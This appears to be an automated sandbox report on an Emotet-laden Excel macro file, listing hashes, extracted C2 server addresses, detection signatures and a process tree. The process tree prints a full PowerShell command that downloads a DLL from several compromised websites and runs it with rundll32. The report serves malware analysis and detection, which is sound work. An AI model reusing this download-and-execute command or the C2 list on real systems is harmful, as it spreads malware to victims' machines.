Resubmissions

24-11-2021 17:59

211124-wk8rgsddbm 10

22-11-2021 14:46

211122-r5n6csagd6 10

22-11-2021 14:46

211122-r5csbsfgdp 10

22-11-2021 14:44

211122-r4kfsafgdn 10

22-11-2021 14:41

211122-r2x9vsfgcq 10

22-11-2021 14:20

211122-rneklaffgr 10

22-11-2021 14:15

211122-rkk8zaffgl 10

17-11-2021 06:51

211117-hm1l1aeefm 10

17-11-2021 06:37

211117-hdnk3seedn 10

Analysis

  • max time kernel
    27s
  • max time network
    26s
  • platform
    windows10_x64
  • resource
    win10-en-20211104
  • submitted
    22-11-2021 14:44

General

  • Target

    865663204559_17_Nov_2021.xlsm

  • Size

    44KB

  • MD5

    477fd718bb764ffe3c5afde16c6c8dd2

  • SHA1

    eb932e19d95f88d64270d40cdc0b92c6d1cf63be

  • SHA256

    ee880ebdf26a1bcebe70a7ba17659199833c6107d758e26d37502bed9a225ee3

  • SHA512

    f7d0451ca3670179cc93a680b99f8982204c43054c55eb479c38dc8ea0ba6ba5b6ebea4508569091c07d95a759841455605e6daeab445146b29fc1af377ba267

Malware Config

Extracted

Family

emotet

Botnet

Epoch4

C2

91.200.186.228:443

191.252.196.221:8080

94.177.248.64:443

66.42.55.5:7080

103.8.26.103:8080

185.184.25.237:8080

103.8.26.102:8080

178.79.147.66:8080

58.227.42.236:80

45.118.135.203:7080

103.75.201.2:443

195.154.133.20:443

45.142.114.231:8080

212.237.5.209:443

207.38.84.195:8080

104.251.214.46:8080

212.237.17.99:8080

212.237.56.116:7080

216.158.226.206:443

110.232.117.186:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)

    suricata: ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)

  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

    suricata: ET MALWARE W32/Emotet CnC Beacon 3

  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\865663204559_17_Nov_2021.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2772
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2648
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3504
        • C:\Windows\SysWow64\rundll32.exe
          "C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\240041168.dll,f1228091526
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:652
          • C:\Windows\SysWOW64\rundll32.exe
            C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\240041168.dll",Control_RunDLL
            5⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious use of WriteProcessMemory
            PID:868
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xckwcvpdfqtsymy\tchlvc.htc",LpFnwazG
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1636
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Xckwcvpdfqtsymy\tchlvc.htc",Control_RunDLL
                7⤵
                • Blocklisted process makes network request
                • Suspicious behavior: EnumeratesProcesses
                PID:1584

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\240041168.dll
    MD5

    8d7b38a64716482257f85636c493908a

    SHA1

    297f32d9f037815046ef4647197b133369c808ff

    SHA256

    c5658dfae705cd7ca667723dab4834fef0b0ad574a278b35fddbdf3311e24599

    SHA512

    10ff4f53deefa7de1ade08f179c32e62539bab78ad349c57164183ce7dd4990f04f2cc347913ab0c740447e5506a561be116d6820649ff435d2186393c1059b0

  • \ProgramData\240041168.dll
    MD5

    8d7b38a64716482257f85636c493908a

    SHA1

    297f32d9f037815046ef4647197b133369c808ff

    SHA256

    c5658dfae705cd7ca667723dab4834fef0b0ad574a278b35fddbdf3311e24599

    SHA512

    10ff4f53deefa7de1ade08f179c32e62539bab78ad349c57164183ce7dd4990f04f2cc347913ab0c740447e5506a561be116d6820649ff435d2186393c1059b0

  • \ProgramData\240041168.dll
    MD5

    8d7b38a64716482257f85636c493908a

    SHA1

    297f32d9f037815046ef4647197b133369c808ff

    SHA256

    c5658dfae705cd7ca667723dab4834fef0b0ad574a278b35fddbdf3311e24599

    SHA512

    10ff4f53deefa7de1ade08f179c32e62539bab78ad349c57164183ce7dd4990f04f2cc347913ab0c740447e5506a561be116d6820649ff435d2186393c1059b0

  • memory/652-323-0x0000000000000000-mapping.dmp
  • memory/652-340-0x0000000010000000-0x0000000010028000-memory.dmp
    Filesize

    160KB

  • memory/868-339-0x0000000000000000-mapping.dmp
  • memory/1584-343-0x0000000000000000-mapping.dmp
  • memory/1636-342-0x0000000000000000-mapping.dmp
  • memory/2648-274-0x0000000000000000-mapping.dmp
  • memory/2772-123-0x00000214D4C90000-0x00000214D4C92000-memory.dmp
    Filesize

    8KB

  • memory/2772-125-0x00000214D4C90000-0x00000214D4C92000-memory.dmp
    Filesize

    8KB

  • memory/2772-124-0x00000214D4C90000-0x00000214D4C92000-memory.dmp
    Filesize

    8KB

  • memory/2772-118-0x00007FF83D520000-0x00007FF83D530000-memory.dmp
    Filesize

    64KB

  • memory/2772-122-0x00007FF83D520000-0x00007FF83D530000-memory.dmp
    Filesize

    64KB

  • memory/2772-121-0x00007FF83D520000-0x00007FF83D530000-memory.dmp
    Filesize

    64KB

  • memory/2772-120-0x00007FF83D520000-0x00007FF83D530000-memory.dmp
    Filesize

    64KB

  • memory/2772-119-0x00007FF83D520000-0x00007FF83D530000-memory.dmp
    Filesize

    64KB

  • memory/3504-289-0x000002939D900000-0x000002939D902000-memory.dmp
    Filesize

    8KB

  • memory/3504-290-0x000002939D903000-0x000002939D905000-memory.dmp
    Filesize

    8KB

  • memory/3504-298-0x000002939D906000-0x000002939D908000-memory.dmp
    Filesize

    8KB

  • memory/3504-315-0x000002939D908000-0x000002939D909000-memory.dmp
    Filesize

    4KB

  • memory/3504-279-0x0000000000000000-mapping.dmp